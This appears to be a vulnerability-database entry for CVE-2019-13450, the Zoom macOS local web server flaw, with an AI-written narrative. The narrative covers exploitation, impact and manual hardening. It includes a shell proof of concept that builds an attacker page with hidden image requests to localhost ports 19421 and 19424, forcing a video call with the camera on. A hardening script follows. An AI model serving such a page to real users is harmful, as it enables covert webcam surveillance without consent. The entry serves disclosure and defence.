CVE-2019-13450
Description
Zoom Client for macOS installs a local web server that allows any website to force-enable the camera and join a video call without user permission.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
The Zoom Client for macOS through version 4.4.4, and the RingCentral-branded build 7.0.136380.0312, installs a local web server that listens on localhost TCP port 19421 (Zoom) or 19424 (RingCentral). The server accepts plain HTTP requests with no authentication and no check of the requesting origin, so any web page open in a browser on the same machine can send it commands, including one that launches a meeting. Because the client joins with video on by default, the victim's camera comes on without a single click inside Zoom. The server lives under ~/.zoomus and keeps running after the client is uninstalled, so the exposure outlives the application for as long as that directory remains.
Exploitation
The attacker needs only to host a web page and get the victim to load it in any browser (Safari, Chrome or Firefox) on a machine where the Zoom client is, or was, installed. No authentication, no prior interaction with the Zoom app and no network access beyond serving the page are required. Once loaded, the page issues HTTP requests to http://localhost:19421 or http://localhost:19424; because the server answers any origin, a plain image or script request from the attacker's site is enough to make the client join a meeting of the attacker's choosing with the camera enabled, the same effect as opening a Zoom meeting URI by hand [1][2].
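The attack page described above, as an added example that is not part of this entry, of the vendor's code or of the cited disclosure: a small shell script that generates the attacker page and, on the host under test, probes the two ports from the command line to show that an unauthenticated request is all it takes. The image-beacon technique (a GET for an image is not subject to CORS, so any origin can fire it) and the /launch?action=join&confno=<n> query form are taken from the public disclosure and are treated as assumptions here; the function names and the ZOOM_PORT/RINGCENTRAL_PORT names are chosen for this example.

```shell
#!/bin/sh
# Added example for this CVE entry, not code from the record or the disclosure.
# Emits a minimal attacker page that drives the Zoom local web server with
# <img> beacons. A plain GET for an image is not subject to CORS, so a page on
# any origin can issue it. The /launch?action=join&confno=<n> query form is the
# one reported in the public disclosure and is an assumption here.
set -eu

ZOOM_PORT=19421         # Zoom Client local server
RINGCENTRAL_PORT=19424  # RingCentral build of the same client

# zoom_launch_url PORT CONFNO -> the localhost URL the victim's browser fetches.
# CONFNO is restricted to digits so an attacker-chosen value cannot break out of
# the HTML attribute it is embedded in below.
zoom_launch_url() {
    port=$1
    confno=$2
    case $confno in
        ''|*[!0-9]*) echo "confno must be numeric" >&2; return 1 ;;
    esac
    printf 'http://localhost:%s/launch?action=join&confno=%s\n' "$port" "$confno"
}

# zoom_poc_page CONFNO -> HTML that targets both ports as soon as it loads.
# No click is needed: the browser requests images during page load.
zoom_poc_page() {
    confno=$1
    zoom_url=$(zoom_launch_url "$ZOOM_PORT" "$confno")
    rc_url=$(zoom_launch_url "$RINGCENTRAL_PORT" "$confno")
    cat <<EOF
<!doctype html>
<html><body>
<p>Nothing to see here.</p>
<img src="$zoom_url" width="1" height="1" alt="">
<img src="$rc_url" width="1" height="1" alt="">
</body></html>
EOF
}

# zoom_probe PORT -> prints the HTTP status the local server returns to an
# unauthenticated request from the command line (000 if nothing is listening).
# Run this on the host under test; it needs curl and a live client.
zoom_probe() {
    port=$1
    curl -s -m 2 -o /dev/null -w '%{http_code}\n' "http://localhost:$port/" || true
}

case "${1:-}" in
    --page)  zoom_poc_page "$2" ;;                                  # ./poc.sh --page 123456789 > index.html
    --probe) zoom_probe "$ZOOM_PORT"; zoom_probe "$RINGCENTRAL_PORT" ;;
esac
```

Serve the generated page from any origin and open it in a browser on the host: the two image requests are sent without any user interaction, which is the whole point of the finding.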
Impact
Successful exploitation allows a remote attacker to turn on the victim's webcam and join a video call without the user's knowledge or consent. This is a severe privacy and surveillance risk, resulting in unauthorized video and potentially audio capture. The attacker gains no access to files or system code execution, but achieves a serious violation of the user's physical privacy. Since the camera activation occurs silently, the victim may remain unaware until after the fact.
Mitigation
Zoom initially declined to remove the local web server, describing it as a deliberate workaround for Safari's URL-handler confirmation prompt rather than a security issue [1]. Users who cannot wait for a vendor fix must disable the server by hand. The steps from the disclosure are: set the ZDisableVideo preference to 1 in Zoom's configuration plist (defaults write ~/Library/Preferences/us.zoom.config.plist ZDisableVideo 1, or the copy under /Library/Preferences with sudo for all accounts) so a forced join at least starts without video; kill the web server process (ZoomOpener); delete the ~/.zoomus directory; and create an empty ~/.zoomus file with mode 000 in its place so the client cannot recreate the directory [1][2]. Re-check that nothing is listening on ports 19421 and 19424 afterwards. No fixed version is recorded in this entry; Zoom later shipped an update that removed the local web server altogether, but any installation still running an affected version remains exposed until it is updated or these manual steps are applied.
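The hardening procedure above, carried through as one script. This is an added example for this entry, not the vendor's tooling: it checks whether anything is listening on the two ports, sets the video-off preference, stops the server process and pins an empty, unreadable ~/.zoomus in place of the directory. The process name ZoomOpener and the preference domain us.zoom.config come from the public disclosure and are assumptions here, as are the function names; the file-pinning step takes the home directory as a parameter so it can be exercised against a scratch directory before touching a real account.

```shell
#!/bin/sh
# Added example for this CVE entry, not the vendor's tooling. Applies the manual
# hardening from the cited disclosure to a macOS account: disable the video-on
# default, stop the local web server, and replace ~/.zoomus with an empty
# mode-000 file so the server cannot be recreated there. ZoomOpener and
# us.zoom.config are taken from the disclosure and are assumptions here.
set -eu

# zoom_ports -> the localhost ports the vulnerable server listens on.
zoom_ports() { echo "19421 19424"; }

# zoom_server_listening PORT -> 0 if something listens on localhost:PORT,
# 1 if not, 2 if lsof is unavailable and we cannot tell.
zoom_server_listening() {
    port=$1
    command -v lsof >/dev/null 2>&1 || return 2
    lsof -nP -iTCP:"$port" -sTCP:LISTEN >/dev/null 2>&1
}

# zoom_check -> report each port; exit 0 only if nothing is listening.
zoom_check() {
    found=0
    for p in $(zoom_ports); do
        if zoom_server_listening "$p"; then
            echo "localhost:$p is LISTENING"; found=1
        else
            echo "localhost:$p is closed (or lsof unavailable)"
        fi
    done
    return $found
}

# zoom_disable_video -> a forced join then starts without video. Only
# meaningful on macOS, where the defaults(1) tool exists.
zoom_disable_video() {
    command -v defaults >/dev/null 2>&1 || { echo "defaults not available; skipping" >&2; return 0; }
    defaults write "$HOME/Library/Preferences/us.zoom.config.plist" ZDisableVideo 1
}

# zoom_kill_server -> stop the ZoomOpener process if it is running.
zoom_kill_server() {
    pkill -x ZoomOpener 2>/dev/null || echo "no ZoomOpener process found" >&2
}

# zoom_neutralize_dir HOME_DIR -> remove HOME_DIR/.zoomus and leave an empty
# mode-000 regular file in its place so the client cannot recreate the directory.
zoom_neutralize_dir() {
    home=$1
    target="$home/.zoomus"
    rm -rf "$target"
    : > "$target"
    chmod 000 "$target"
}

# zoom_harden -> run every step against the current account, then re-check.
zoom_harden() {
    zoom_disable_video
    zoom_kill_server
    zoom_neutralize_dir "$HOME"
    zoom_check || echo "a server is still listening; kill it manually and re-run --check" >&2
}

case "${1:-}" in
    --check) zoom_check ;;    # ./harden.sh --check  (read-only)
    --apply) zoom_harden ;;   # ./harden.sh --apply  (modifies the account)
esac
```

Run with --check first; --apply is destructive to ~/.zoomus by design. The listening check is the part worth keeping around after the fix, since it is what tells you the server is really gone rather than merely reinstalled.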
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Zoom / Zoom Client
  - Range: 7.0.136380.0312 (RingCentral build)
  - Range: <=4.4.4
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
- www.securityfocus.com/bid/109082 (BID)
- assets.zoom.us/docs/pdf/Zoom+Response+Video-On+Vulnerability.pdf
- blog.zoom.us/wordpress/2019/07/08/response-to-video-on-concern/
- bugs.chromium.org/p/chromium/issues/detail
- medium.com/%40jonathan.leitschuh/zoom-zero-day-4-million-webcams-maybe-an-rce-just-get-them-to-visit-your-website-ac75c83f4ef5
- news.ycombinator.com/item
- twitter.com/moreati/status/1148548799813640193
- twitter.com/zoom_us/status/1148710712241295361
News mentions
No linked articles in our index yet.